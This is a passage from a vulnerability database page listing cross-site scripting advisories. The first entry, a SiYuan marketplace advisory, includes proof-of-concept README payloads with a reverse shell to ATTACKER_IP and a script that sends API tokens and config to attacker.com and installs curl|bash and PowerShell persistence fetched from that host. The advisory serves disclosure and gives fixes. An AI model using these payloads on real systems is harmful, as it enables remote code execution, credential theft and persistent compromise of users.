Common Weakness Enumeration

CWE-79

Allowed

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Abstraction: Base · Status: Stable

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

66679 vulnerabilities reference this CWE, most recent first.

GHSA-4663-4MPG-879V

Vulnerability from github – Published: 2026-03-18 16:09 – Updated: 2026-03-20 21:23
VLAI
Summary
SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering
Details

Stored XSS to RCE via Unsanitized Bazaar README Rendering

Summary

SiYuan's Bazaar (community marketplace) renders package README content without HTML sanitization. The backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution.

Affected Component

  • README rendering (backend): kernel/bazaar/package.go:635-645 (renderREADME function)
  • README rendering (frontend): app/src/config/bazaar.ts:607 (innerHTML assignment)
  • Electron config: app/electron/main.js:422-426 (nodeIntegration: true, contextIsolation: false)

Affected Versions

- SiYuan <= 3.5.9

Severity

Critical — CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

  • CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)

Note: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.

Vulnerable Code

Backend: kernel/bazaar/package.go:635-645

func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()  // Fresh Lute instance — SetSanitize NOT called
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))  // Raw HTML in Markdown is PRESERVED
    return
}

Compare with SiYuan's own note renderer in kernel/util/lute.go:81, which does sanitize:

luteEngine.SetSanitize(true)  // Notes ARE sanitized — but Bazaar README is NOT

This inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to Bazaar content.

Frontend: app/src/config/bazaar.ts:607

fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = response.data.html;  // Unsanitized HTML injected into DOM
});

The backend returns unsanitized HTML, and the frontend blindly assigns it to innerHTML without any client-side sanitization (e.g., DOMPurify).

Electron: app/electron/main.js:422-426

webPreferences: {
    nodeIntegration: true,
    contextIsolation: false,
    // ...
}

Any JavaScript executing in the renderer has direct access to Node.js APIs.

Proof of Concept

Step 1: Create a malicious README

Create a GitHub repository with a valid SiYuan plugin/theme/template structure. The README.md contains embedded HTML:

# Helpful Productivity Plugin

This plugin helps you organize your notes with smart templates and AI-powered suggestions.

## Features

- Smart template insertion
- AI-powered note organization
- Cross-platform sync

<img src=x onerror="require('child_process').exec('calc.exe')">

## Installation

Install via the SiYuan Bazaar marketplace.

## License

MIT

The raw <img> tag with onerror handler is valid Markdown (HTML passthrough). The Lute engine preserves it because SetSanitize(true) is not called. The frontend renders it via innerHTML, and the broken image triggers onerror, executing calc.exe.

Step 2: Submit to Bazaar

Submit the repository to the SiYuan Bazaar via the standard community contribution process.

Step 3: One-click RCE

When a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The onerror handler fires, executing arbitrary OS commands.

Escalation: Reverse shell

# Cool Theme for SiYuan

Beautiful dark theme with custom fonts.

<img src=x onerror="require('child_process').exec('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"')">

Escalation: Multi-stage payload via README

A more sophisticated attack can hide the payload deeper in the README to avoid casual review:

# Professional Note Templates

A comprehensive collection of note templates for professionals.

## Templates Included

| Category | Count | Description |
|----------|-------|-------------|
| Business | 15 | Meeting notes, project plans |
| Academic | 12 | Research notes, citations |
| Personal | 8 | Journal, habit tracking |

## Screenshots

<!-- Legitimate-looking image reference -->
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://attacker.com/dark.png">
  <source media="(prefers-color-scheme: light)" srcset="https://attacker.com/light.png">
  <img src="https://attacker.com/screenshot.png" alt="Template Preview" onload="
    var c = require('child_process');
    var o = require('os');
    var f = require('fs');
    var p = require('path');

    // Exfiltrate sensitive data
    var home = o.homedir();
    var configDir = p.join(home, '.config', 'siyuan');
    var data = {};

    try { data.apiToken = f.readFileSync(p.join(configDir, 'cookie.key'), 'utf8'); } catch(e) {}
    try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, 'conf.json'), 'utf8')); } catch(e) {}
    try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}

    // Send to attacker
    var https = require('https');
    var payload = JSON.stringify(data);
    var req = https.request({
      hostname: 'attacker.com', port: 443, path: '/collect', method: 'POST',
      headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
    });
    req.write(payload);
    req.end();

    // Drop persistence
    if (o.platform() === 'win32') {
      c.exec('schtasks /create /tn SiYuanSync /tr \"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\"https://attacker.com/stage2.ps1\\\"))\" /sc onlogon /rl highest /f');
    } else {
      c.exec('(crontab -l 2>/dev/null; echo \"@reboot curl -s https://attacker.com/stage2.sh | bash\") | crontab -');
    }
  ">
</picture>

## Changelog

- v1.0.0: Initial release

This payload: 1. Uses onload instead of onerror (fires on successful image load from attacker's server) 2. Exfiltrates SiYuan API token, config, hostname, username, and platform info 3. Installs cross-platform persistence (Windows scheduled task / Linux crontab) 4. Is buried inside a legitimate-looking <picture> element that blends with real README content

Escalation: SVG-based payload (bypasses naive img filtering)

## Architecture

<svg onload="require('child_process').exec('id > /tmp/pwned')">
  <rect width="100" height="100" fill="blue"/>
</svg>

Escalation: Details/summary element (interactive trigger)

## FAQ

<details ontoggle="require('child_process').exec('whoami > /tmp/pwned')" open>
  <summary>How do I install this plugin?</summary>
  Use the SiYuan Bazaar to install.
</details>

The open attribute causes ontoggle to fire immediately without user interaction with the element itself.

Attack Scenario

  1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.
  2. The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a <picture> tag, <details> block, or <svg>).
  3. Attacker submits the package to the SiYuan Bazaar via the community contribution process.
  4. A SiYuan user browses the Bazaar and clicks on the package to view its details/README.
  5. The backend renders the README via renderREADME() without sanitization.
  6. The frontend assigns the HTML to innerHTML.
  7. The injected JavaScript executes with full Node.js access.
  8. The attacker achieves RCE — reverse shell, data theft, persistence, etc.

Impact

  • Full remote code execution on any SiYuan desktop user who views the malicious package README
  • One-click — triggered by viewing package details in the Bazaar
  • Supply-chain attack via the official SiYuan community marketplace
  • Payloads can be deeply hidden in legitimate-looking README content, making code review difficult
  • Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files
  • Can install persistent backdoors across Windows, macOS, and Linux
  • Multiple HTML elements can carry payloads (img, svg, details, picture, video, audio, iframe, object, embed, math, etc.)
  • Affects all platforms: Windows, macOS, Linux

Suggested Fix

1. Enable Lute sanitization for README rendering (package.go)

func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()
    luteEngine.SetSanitize(true)  // ADD THIS — matches note renderer behavior
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))
    return
}

2. Add client-side sanitization as defense-in-depth (bazaar.ts)

import DOMPurify from 'dompurify';

fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = DOMPurify.sanitize(response.data.html);
});

3. Long-term: Harden Electron configuration

webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260314111550-b382f50e1880"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:09:24Z",
    "nvd_published_at": "2026-03-20T09:16:14Z",
    "severity": "MODERATE"
  },
  "details": "# Stored XSS to RCE via Unsanitized Bazaar README Rendering\n\n## Summary\n\nSiYuan\u0027s Bazaar (community marketplace) renders package README content without HTML sanitization. The backend `renderREADME` function uses `lute.New()` without calling `SetSanitize(true)`, allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to `innerHTML` without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan\u0027s Electron configuration enables `nodeIntegration: true` with `contextIsolation: false`, this XSS escalates directly to full Remote Code Execution.\n\n## Affected Component\n\n- **README rendering (backend)**: `kernel/bazaar/package.go:635-645` (`renderREADME` function)\n- **README rendering (frontend)**: `app/src/config/bazaar.ts:607` (`innerHTML` assignment)\n- **Electron config**: `app/electron/main.js:422-426` (`nodeIntegration: true`, `contextIsolation: false`)\n\n## Affected Versions\n\n- SiYuan \u003c= 3.5.9\n- \n## Severity\n\n**Critical** \u2014 CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)\n\nNote: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.\n\n## Vulnerable Code\n\n### Backend: `kernel/bazaar/package.go:635-645`\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n    luteEngine := lute.New()  // Fresh Lute instance \u2014 SetSanitize NOT called\n    luteEngine.SetSoftBreak2HardBreak(false)\n    luteEngine.SetCodeSyntaxHighlight(false)\n    linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n    luteEngine.SetLinkBase(linkBase)\n    ret = luteEngine.Md2HTML(string(mdData))  // Raw HTML in Markdown is PRESERVED\n    return\n}\n```\n\nCompare with SiYuan\u0027s own note renderer in `kernel/util/lute.go:81`, which **does** sanitize:\n\n```go\nluteEngine.SetSanitize(true)  // Notes ARE sanitized \u2014 but Bazaar README is NOT\n```\n\nThis inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to Bazaar content.\n\n### Frontend: `app/src/config/bazaar.ts:607`\n\n```typescript\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response =\u003e {\n    mdElement.innerHTML = response.data.html;  // Unsanitized HTML injected into DOM\n});\n```\n\nThe backend returns unsanitized HTML, and the frontend blindly assigns it to `innerHTML` without any client-side sanitization (e.g., DOMPurify).\n\n### Electron: `app/electron/main.js:422-426`\n\n```javascript\nwebPreferences: {\n    nodeIntegration: true,\n    contextIsolation: false,\n    // ...\n}\n```\n\nAny JavaScript executing in the renderer has direct access to Node.js APIs.\n\n## Proof of Concept\n\n### Step 1: Create a malicious README\n\nCreate a GitHub repository with a valid SiYuan plugin/theme/template structure. The `README.md` contains embedded HTML:\n\n```markdown\n# Helpful Productivity Plugin\n\nThis plugin helps you organize your notes with smart templates and AI-powered suggestions.\n\n## Features\n\n- Smart template insertion\n- AI-powered note organization\n- Cross-platform sync\n\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\"\u003e\n\n## Installation\n\nInstall via the SiYuan Bazaar marketplace.\n\n## License\n\nMIT\n```\n\nThe raw `\u003cimg\u003e` tag with `onerror` handler is valid Markdown (HTML passthrough). The Lute engine preserves it because `SetSanitize(true)` is not called. The frontend renders it via `innerHTML`, and the broken image triggers `onerror`, executing `calc.exe`.\n\n### Step 2: Submit to Bazaar\n\nSubmit the repository to the SiYuan Bazaar via the standard community contribution process.\n\n### Step 3: One-click RCE\n\nWhen a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The `onerror` handler fires, executing arbitrary OS commands.\n\n### Escalation: Reverse shell\n\n```markdown\n# Cool Theme for SiYuan\n\nBeautiful dark theme with custom fonts.\n\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027bash -c \\\"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/4444 0\u003e\u00261\\\"\u0027)\"\u003e\n```\n\n### Escalation: Multi-stage payload via README\n\nA more sophisticated attack can hide the payload deeper in the README to avoid casual review:\n\n```markdown\n# Professional Note Templates\n\nA comprehensive collection of note templates for professionals.\n\n## Templates Included\n\n| Category | Count | Description |\n|----------|-------|-------------|\n| Business | 15 | Meeting notes, project plans |\n| Academic | 12 | Research notes, citations |\n| Personal | 8 | Journal, habit tracking |\n\n## Screenshots\n\n\u003c!-- Legitimate-looking image reference --\u003e\n\u003cpicture\u003e\n  \u003csource media=\"(prefers-color-scheme: dark)\" srcset=\"https://attacker.com/dark.png\"\u003e\n  \u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://attacker.com/light.png\"\u003e\n  \u003cimg src=\"https://attacker.com/screenshot.png\" alt=\"Template Preview\" onload=\"\n    var c = require(\u0027child_process\u0027);\n    var o = require(\u0027os\u0027);\n    var f = require(\u0027fs\u0027);\n    var p = require(\u0027path\u0027);\n\n    // Exfiltrate sensitive data\n    var home = o.homedir();\n    var configDir = p.join(home, \u0027.config\u0027, \u0027siyuan\u0027);\n    var data = {};\n\n    try { data.apiToken = f.readFileSync(p.join(configDir, \u0027cookie.key\u0027), \u0027utf8\u0027); } catch(e) {}\n    try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, \u0027conf.json\u0027), \u0027utf8\u0027)); } catch(e) {}\n    try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}\n\n    // Send to attacker\n    var https = require(\u0027https\u0027);\n    var payload = JSON.stringify(data);\n    var req = https.request({\n      hostname: \u0027attacker.com\u0027, port: 443, path: \u0027/collect\u0027, method: \u0027POST\u0027,\n      headers: { \u0027Content-Type\u0027: \u0027application/json\u0027, \u0027Content-Length\u0027: payload.length }\n    });\n    req.write(payload);\n    req.end();\n\n    // Drop persistence\n    if (o.platform() === \u0027win32\u0027) {\n      c.exec(\u0027schtasks /create /tn SiYuanSync /tr \\\"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\\\\\"https://attacker.com/stage2.ps1\\\\\\\"))\\\" /sc onlogon /rl highest /f\u0027);\n    } else {\n      c.exec(\u0027(crontab -l 2\u003e/dev/null; echo \\\"@reboot curl -s https://attacker.com/stage2.sh | bash\\\") | crontab -\u0027);\n    }\n  \"\u003e\n\u003c/picture\u003e\n\n## Changelog\n\n- v1.0.0: Initial release\n```\n\nThis payload:\n1. Uses `onload` instead of `onerror` (fires on successful image load from attacker\u0027s server)\n2. Exfiltrates SiYuan API token, config, hostname, username, and platform info\n3. Installs cross-platform persistence (Windows scheduled task / Linux crontab)\n4. Is buried inside a legitimate-looking `\u003cpicture\u003e` element that blends with real README content\n\n### Escalation: SVG-based payload (bypasses naive img filtering)\n\n```markdown\n## Architecture\n\n\u003csvg onload=\"require(\u0027child_process\u0027).exec(\u0027id \u003e /tmp/pwned\u0027)\"\u003e\n  \u003crect width=\"100\" height=\"100\" fill=\"blue\"/\u003e\n\u003c/svg\u003e\n```\n\n### Escalation: Details/summary element (interactive trigger)\n\n```markdown\n## FAQ\n\n\u003cdetails ontoggle=\"require(\u0027child_process\u0027).exec(\u0027whoami \u003e /tmp/pwned\u0027)\" open\u003e\n  \u003csummary\u003eHow do I install this plugin?\u003c/summary\u003e\n  Use the SiYuan Bazaar to install.\n\u003c/details\u003e\n```\n\nThe `open` attribute causes `ontoggle` to fire immediately without user interaction with the element itself.\n\n## Attack Scenario\n\n1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.\n2. The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a `\u003cpicture\u003e` tag, `\u003cdetails\u003e` block, or `\u003csvg\u003e`).\n3. Attacker submits the package to the SiYuan Bazaar via the community contribution process.\n4. A SiYuan user browses the Bazaar and clicks on the package to view its details/README.\n5. The backend renders the README via `renderREADME()` without sanitization.\n6. The frontend assigns the HTML to `innerHTML`.\n7. The injected JavaScript executes with full Node.js access.\n8. The attacker achieves RCE \u2014 reverse shell, data theft, persistence, etc.\n\n## Impact\n\n- **Full remote code execution** on any SiYuan desktop user who views the malicious package README\n- **One-click** \u2014 triggered by viewing package details in the Bazaar\n- **Supply-chain attack** via the official SiYuan community marketplace\n- Payloads can be deeply hidden in legitimate-looking README content, making code review difficult\n- Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files\n- Can install persistent backdoors across Windows, macOS, and Linux\n- Multiple HTML elements can carry payloads (`img`, `svg`, `details`, `picture`, `video`, `audio`, `iframe`, `object`, `embed`, `math`, etc.)\n- Affects all platforms: Windows, macOS, Linux\n\n## Suggested Fix\n\n### 1. Enable Lute sanitization for README rendering (`package.go`)\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n    luteEngine := lute.New()\n    luteEngine.SetSanitize(true)  // ADD THIS \u2014 matches note renderer behavior\n    luteEngine.SetSoftBreak2HardBreak(false)\n    luteEngine.SetCodeSyntaxHighlight(false)\n    linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n    luteEngine.SetLinkBase(linkBase)\n    ret = luteEngine.Md2HTML(string(mdData))\n    return\n}\n```\n\n### 2. Add client-side sanitization as defense-in-depth (`bazaar.ts`)\n\n```typescript\nimport DOMPurify from \u0027dompurify\u0027;\n\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response =\u003e {\n    mdElement.innerHTML = DOMPurify.sanitize(response.data.html);\n});\n```\n\n### 3. Long-term: Harden Electron configuration\n\n```javascript\nwebPreferences: {\n    nodeIntegration: false,\n    contextIsolation: true,\n    sandbox: true,\n}\n```",
  "id": "GHSA-4663-4mpg-879v",
  "modified": "2026-03-20T21:23:36Z",
  "published": "2026-03-18T16:09:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33066"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering"
}

GHSA-466J-7CC4-9XRQ

Vulnerability from github – Published: 2022-05-17 04:40 – Updated: 2022-05-17 04:40
VLAI
Details

Cross-site scripting (XSS) vulnerability in client-assist.php in the dsSearchAgent: WordPress Edition plugin 1.0-beta10 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-4522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-07-02T18:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Cross-site scripting (XSS) vulnerability in client-assist.php in the dsSearchAgent: WordPress Edition plugin 1.0-beta10 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter.",
  "id": "GHSA-466j-7cc4-9xrq",
  "modified": "2022-05-17T04:40:10Z",
  "published": "2022-05-17T04:40:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4522"
    },
    {
      "type": "WEB",
      "url": "http://codevigilant.com/disclosure/wp-plugin-dssearchagent-wordpress-edition-a3-cross-site-scripting-xss"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-466M-2QM3-2495

Vulnerability from github – Published: 2026-01-08 18:30 – Updated: 2026-01-08 18:30
VLAI
Details

Ideagen DevonWay contains a stored cross site scripting vulnerability. A remote, authenticated attacker could craft a payload in the 'Reports' page that executes when another user views the report. Fixed in 2.62.4 and 2.62 LTS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22587"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-08T18:16:00Z",
    "severity": "MODERATE"
  },
  "details": "Ideagen DevonWay contains a stored cross site scripting vulnerability. A remote, authenticated attacker could craft a payload in the \u0027Reports\u0027 page that executes when another user views the report. Fixed in 2.62.4 and 2.62 LTS.",
  "id": "GHSA-466m-2qm3-2495",
  "modified": "2026-01-08T18:30:50Z",
  "published": "2026-01-08T18:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22587"
    },
    {
      "type": "WEB",
      "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-03.json"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-22587"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-466M-M85X-CQJ9

Vulnerability from github – Published: 2022-04-09 00:00 – Updated: 2022-04-15 00:00
VLAI
Details

A cross-site scripting (XSS) vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers inject arbitrary HTML or JavaScript through /example/editor.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-24229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-08T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A cross-site scripting (XSS) vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers inject arbitrary HTML or JavaScript through /example/editor.",
  "id": "GHSA-466m-m85x-cqj9",
  "modified": "2022-04-15T00:00:56Z",
  "published": "2022-04-09T00:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24229"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ONLYOFFICE/document-server-integration/issues/252"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ONLYOFFICE/DocumentServer"
    },
    {
      "type": "WEB",
      "url": "https://www.onlyoffice.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4672-XFRQ-9PJW

Vulnerability from github – Published: 2022-05-14 01:50 – Updated: 2022-05-14 01:50
VLAI
Details

Pagoda Linux panel V6.0 has XSS via the verification code associated with an invalid account login. A crafted code is mishandled during rendering of the login log.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-18825"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-30T06:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Pagoda Linux panel V6.0 has XSS via the verification code associated with an invalid account login. A crafted code is mishandled during rendering of the login log.",
  "id": "GHSA-4672-xfrq-9pjw",
  "modified": "2022-05-14T01:50:21Z",
  "published": "2022-05-14T01:50:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18825"
    },
    {
      "type": "WEB",
      "url": "https://github.com/misterrou/rourou/blob/master/bt.docx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4675-P6MW-CP72

Vulnerability from github – Published: 2025-09-26 09:31 – Updated: 2026-04-01 18:36
VLAI
Details

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Lenix scss compiler allows Stored XSS. This issue affects Lenix scss compiler: from n/a through 1.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-60144"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-26T09:15:42Z",
    "severity": "MODERATE"
  },
  "details": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027) vulnerability in yonifre Lenix scss compiler allows Stored XSS. This issue affects Lenix scss compiler: from n/a through 1.2.",
  "id": "GHSA-4675-p6mw-cp72",
  "modified": "2026-04-01T18:36:22Z",
  "published": "2025-09-26T09:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60144"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/lenix-scss-compiler/vulnerability/wordpress-lenix-scss-compiler-plugin-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4676-QH4G-4H4X

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-29 03:31
VLAI
Details

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle AdForest Elementor adforest-elementor allows Reflected XSS.This issue affects AdForest Elementor: from n/a through <= 3.0.11.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-67947"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:16:04Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027) vulnerability in scriptsbundle AdForest Elementor adforest-elementor allows Reflected XSS.This issue affects AdForest Elementor: from n/a through \u003c= 3.0.11.",
  "id": "GHSA-4676-qh4g-4h4x",
  "modified": "2026-01-29T03:31:26Z",
  "published": "2026-01-22T18:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67947"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/adforest-elementor/vulnerability/wordpress-adforest-elementor-plugin-3-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4677-MWX7-HW3W

Vulnerability from github – Published: 2025-06-16 18:32 – Updated: 2025-06-16 18:32
VLAI
Details

A vulnerability, which was classified as problematic, was found in CodeAstro Food Ordering System 1.0. Affected is an unknown function of the file /admin/store/edit/ of the component POST Request Parameter Handler. The manipulation of the argument Restaurant Name/Address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6131"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-16T17:15:31Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as problematic, was found in CodeAstro Food Ordering System 1.0. Affected is an unknown function of the file /admin/store/edit/ of the component POST Request Parameter Handler. The manipulation of the argument Restaurant Name/Address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-4677-mwx7-hw3w",
  "modified": "2025-06-16T18:32:20Z",
  "published": "2025-06-16T18:32:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6131"
    },
    {
      "type": "WEB",
      "url": "https://codeastro.com"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Vanshdhawan188/Food-Ordering-System-in-PHP-CodeIgniter-/blob/main/Stored%20Cross-Site%20Scripting%20(XSS).md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.312600"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.312600"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.592780"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
